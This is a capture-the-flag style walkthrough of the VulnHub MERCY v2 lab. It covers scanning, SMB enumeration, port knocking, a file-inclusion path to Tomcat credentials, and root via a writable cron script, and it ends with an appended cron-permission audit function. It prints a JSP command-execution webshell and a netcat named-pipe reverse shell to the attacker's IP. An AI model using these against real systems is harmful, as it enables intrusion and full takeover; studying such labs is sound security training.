泷羽Sec-尘宇安全
Preface
OSCP prep, OSCP series: MERCY (v2) lab: SMB share files + username enumeration, port knocking, RIPS local file inclusion, Tomcat getshell, cron job privilege escalation
Difficulty: easy to moderate
- Getting a low-privilege shell involves: SMB share files + username enumeration, port knocking, RIPS local file inclusion, Tomcat getshell
- Privilege escalation: cron job privilege escalation
Download:
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/
nmap
Host discovery
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:08 CST
Nmap scan report for 10.10.10.1
Host is up (0.00088s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00015s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.150
Host is up (0.0027s latency).
MAC Address: 00:0C:29:3B:46:30 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00072s latency).
MAC Address: 00:50:56:E3:2F:42 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.09 seconds
Port scan
Ports 22 and 80 show as filtered, so port knocking is probably required.
└─# nmap --min-rate 10000 -p- 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:09 CST
Nmap scan report for 10.10.10.150
Host is up (0.0025s latency).
Not shown: 65525 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp filtered ssh
53/tcp open domain
80/tcp filtered http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
8080/tcp open http-proxy
MAC Address: 00:0C:29:3B:46:30 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.36 seconds
└─# nmap --min-rate 10000 -p- 10.10.10.150 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:10 CST
Warning: 10.10.10.150 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.150
Host is up (0.00076s latency).
Not shown: 65453 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
137/udp open netbios-ns
5353/udp open zeroconf
MAC Address: 00:0C:29:3B:46:30 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 73.00 seconds
Detailed port scan
└─# ports=$(grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')
┌──(root㉿192)-[/home/kali/桌面/nmap]
└─# echo $ports
53,110,139,143,445,993,995,8080
└─# nmap -sV -sT -sC -O -p$ports 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:15 CST
Nmap scan report for 10.10.10.150
Host is up (0.00078s latency).
Bug in imap-capabilities: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp open pop3?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after: 2028-08-23T13:22:55
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:0C:29:3B:46:30 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2025-02-17T21:18:15+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-02-17T13:18:15
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.16 seconds
└─# nmap -sV -sT -sC -O -p5353 10.10.10.150 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:35 CST
Nmap scan report for 10.10.10.150
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
5353/tcp closed mdns
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
|_ Address=10.10.10.150 fe80::20c:29ff:fe3b:4630
MAC Address: 00:0C:29:3B:46:30 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.15 seconds
Vuln scan
└─# nmap --script=vuln -p$ports 10.10.10.150
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-17 21:36 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.150
Host is up (0.00035s latency).
PORT STATE SERVICE
53/tcp open domain
110/tcp open pop3
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
139/tcp open netbios-ssn
143/tcp open imap
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
445/tcp open microsoft-ds
993/tcp open imaps
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
995/tcp open pop3s
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2014-3566 BID:70574
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| TLS_FALLBACK_SCSV properly implemented
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://www.securityfocus.com/bid/70574
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /examples/: Sample scripts
| /robots.txt: Robots file
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
|_ /docs/: Potentially interesting folder
MAC Address: 00:0C:29:3B:46:30 (VMware)
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 100.44 seconds
Information gathering
SMB, 139 & 445
Shared files
List the shares; they cannot be accessed anonymously.
smbclient -L 10.10.10.150
Shares found:
print$
qiu
Username enumeration
Enumerate usernames:
└─# enum4linux -a 10.10.10.150 >1.txt
┌──(root㉿192)-[/home/kali/桌面/测试]
└─# awk -F '\' 'NF>1{print $2}' 1.txt | awk 'NF>0{print $1}' > output.txt
┌──(root㉿192)-[/home/kali/桌面/测试]
└─# cat output.txt
*
nobody
None
pleadformercy
qiu
Administrators
Users
Guests
Power
Account
Server
Print
pleadformercy
qiu
thisisasuperduperlonguser
fluffy
┌──(root㉿192)-[/home/kali/桌面/测试]
└─#
Usernames obtained:
nobody
None
pleadformercy
qiu
Administrators
Users
Guests
Power
Account
Server
Print
pleadformercy
qiu
thisisasuperduperlonguser
fluffy
Web page, 8080
The server is Tomcat 7.0.52.
Two users are hinted at:
manager-gui
admin-gui
Try the arbitrary file write vulnerability (CVE-2017-12615)
- Affected versions: Tomcat 7.0.0 - 7.0.81, 8.5.19
Check whether the PUT method is allowed:
curl -v -X OPTIONS http://10.10.10.150:8080/
PUT is allowed; first verify whether it actually works:
curl -v -X PUT -d 'aaaa' http://10.10.10.150:8080/1.txt
It did not succeed; only a 201 response would mean the write worked.
Directory scan
Everything else is Tomcat's built-in directories, but there is a robots.txt; visit it.
It gives one path:
/tryharder/tryharder
Visiting it returns base64-encoded content.
Decoding it: it says an employee set a weak password, "password".
Two users were hinted at earlier, so first try logging in to the manager:
http://10.10.10.150:8080/manager/html
Login fails.
The SMB share can also be tried with -U to specify a username: the share list earlier had a qiu share, and the enumerated usernames also include qiu, so try connecting:
smbclient //10.10.10.150/qiu -U qiu
Connected successfully; use mget to download in bulk. There are three directories; cd into each and download everything:
smb: \> cd .public
smb: \.public\> ls
. D 0 Sun Aug 26 22:23:24 2018
.. D 0 Sat Sep 1 03:07:00 2018
resources D 0 Sun Aug 26 22:24:21 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.public\> cd resources
smb: \.public\resources\> ls
. D 0 Sun Aug 26 22:24:21 2018
.. D 0 Sun Aug 26 22:23:24 2018
smiley N 54 Sun Aug 26 22:24:21 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.public\resources\> get smiley
getting file \.public\resources\smiley of size 54 as smiley (8.8 KiloBytes/sec) (average 230.6 KiloBytes/sec)
smb: \.public\resources\> cd ..
smb: \.public\> cd ..
smb: \> cd .private
smb: \.private\> ls
. D 0 Mon Aug 27 00:35:34 2018
.. D 0 Sat Sep 1 03:07:00 2018
opensesame D 0 Fri Aug 31 00:36:50 2018
readme.txt N 94 Sun Aug 26 22:22:35 2018
secrets D 0 Tue Nov 20 01:01:09 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.private\> mget readme.txt
Get file readme.txt? y
getting file \.private\readme.txt of size 94 as readme.txt (15.3 KiloBytes/sec) (average 202.5 KiloBytes/sec)
smb: \.private\> cd opensesame
smb: \.private\opensesame\> ls
. D 0 Fri Aug 31 00:36:50 2018
.. D 0 Mon Aug 27 00:35:34 2018
configprint A 539 Fri Aug 31 00:39:14 2018
config N 17543 Sat Sep 1 03:11:56 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.private\opensesame\> mget co*
Get file configprint? y
getting file \.private\opensesame\configprint of size 539 as configprint (131.6 KiloBytes/sec) (average 196.8 KiloBytes/sec)
Get file config? y
getting file \.private\opensesame\config of size 17543 as config (2447.4 KiloBytes/sec) (average 473.2 KiloBytes/sec)
smb: \.private\opensesame\> cd ..
smb: \.private\> cd secrets
smb: \.private\secrets\> ls
. D 0 Tue Nov 20 01:01:09 2018
.. D 0 Mon Aug 27 00:35:34 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.private\secrets\> cd ..
smb: \.private\> cd ..
smb: \> cd .cache
smb: \.cache\> ls
. D 0 Sat Sep 1 02:22:05 2018
.. D 0 Sat Sep 1 03:07:00 2018
motd.legal-displayed N 0 Sat Sep 1 02:22:05 2018
19213004 blocks of size 1024. 16314056 blocks available
smb: \.cache\>
Port knocking, knock
Then look through the downloads: the config file contains the knock sequences:
[openHTTP]
sequence = 159,27391,4
[openSSH]
sequence = 17301,28504,9999
Use the knock tool to knock (the target is 10.10.10.150 throughout):
knock -v 10.10.10.150 159 27391 4
knock -v 10.10.10.150 17301 28504 9999
The previously filtered ports are now open.
Web page, 80
Directory scan
robots.txt is found; visit it. It gives two paths; visit them:
Disallow: /mercy
Disallow: /nomercy
It is a CMS.
Exploitation
RIPS local file inclusion
Identify the application and look up its vulnerabilities: it has a local file inclusion. Verify it by visiting:
http://10.10.10.150/nomercy/windows/code.php?file=../../../../../../etc/passwd
Confirmed.
From the Tomcat default page (or a quick search), the file that stores the accounts and passwords is
/etc/tomcat7/tomcat-users.xml
Include it:
<? <role rolename="admin-gui"/>
<? <role rolename="manager-gui"/>
<? <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<? <user username="fluffy" password="freakishfluffybunny" roles="none"/>
Tomcat getshell
Two sets of credentials obtained:
thisisasuperduperlonguser/heartbreakisinevitable
fluffy/freakishfluffybunny
Log in with thisisasuperduperlonguser/heartbreakisinevitable at
http://10.10.10.150:8080/manager/html
WAR packages can be uploaded. Create a file 1.jsp:
<%
if("023".equals(request.getParameter("pwd"))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
    int a = -1;
    byte[] b = new byte[2048];
    out.print("<pre>");
    while((a=in.read(b))!=-1){
        out.println(new String(b));
    }
    out.print("</pre>");
}
%>
Package it into a WAR file:
jar cvf 1.war 1.jsp
Upload it; it appears in the application list. Visit:
http://10.10.10.150:8080/1/1.jsp?pwd=023&i=ls
Success. A reverse shell can't be obtained through this command execution, though, so upload a reverse shell script instead; one is available at
https://github.com/LaiKash/JSP-Reverse-and-Web-Shell
Visit:
http://10.10.10.150:8080/reverse/reverse.jsp
Reverse shell obtained.
Privilege escalation
First get an interactive terminal:
python -c 'import pty;pty.spawn("/bin/bash")'
There is no gcc, so kernel exploits are out.
Look at /home: the only directory is thisisasuperduperlonguser, which can be entered and inspected.
Cron job privilege escalation
The file inclusion earlier also gave another credential:
fluffy/freakishfluffybunny
Try switching to the fluffy user.
Look in fluffy's home directory; there is a cron job script.
Append a reverse shell command to it:
echo "rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 10.10.10.128 9999 1>/tmp/p" >> timeclock
After a few minutes, a root shell comes back.
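The escalation above works because a job that root runs executes a script that a non-root user can modify. As an added defender's check (not part of the original write-up), the shell function below reads a crontab in user-crontab format (five time fields, or an @reboot/@daily shorthand, followed by the command) and flags every referenced script that is not owned by the crontab's owner or that has group/other write bits set. It assumes GNU stat and GNU find; the crontab and script names in the test are constructed.

```shell
#!/bin/sh
# audit_cron_targets CRONTAB_FILE OWNER
#   Print every command target in CRONTAB_FILE that a user other than OWNER
#   could edit: wrong owner, or group/other write bits set.
#   Limitations (deliberate, to keep this short): only the first word of the
#   command is checked, and writable parent directories are not examined.
audit_cron_targets() {
  crontab_file=$1
  owner=$2
  # Drop comments, blank lines and VAR=value environment lines.
  grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$crontab_file" |
  while read -r f1 f2 f3 f4 f5 rest; do
    case $f1 in
      @*) target=$f2 ;;            # "@daily /path/script args"
      *)  target=${rest%% *} ;;    # "m h dom mon dow /path/script args"
    esac
    [ -f "$target" ] || continue   # skip inline shell and missing files
    file_owner=$(stat -c %U "$target")   # GNU stat
    mode=$(stat -c %a "$target")
    if [ "$file_owner" != "$owner" ]; then
      printf '%s: owned by %s, not %s\n' "$target" "$file_owner" "$owner"
    elif find "$target" -perm /022 -print | grep -q .; then   # GNU find
      printf '%s: writable by group/other (mode %s)\n' "$target" "$mode"
    fi
  done
}
```

Run it as `audit_cron_targets /var/spool/cron/crontabs/root root` (or against /etc/crontab after stripping its user column) and treat every line it prints as a job root should not be running unchanged.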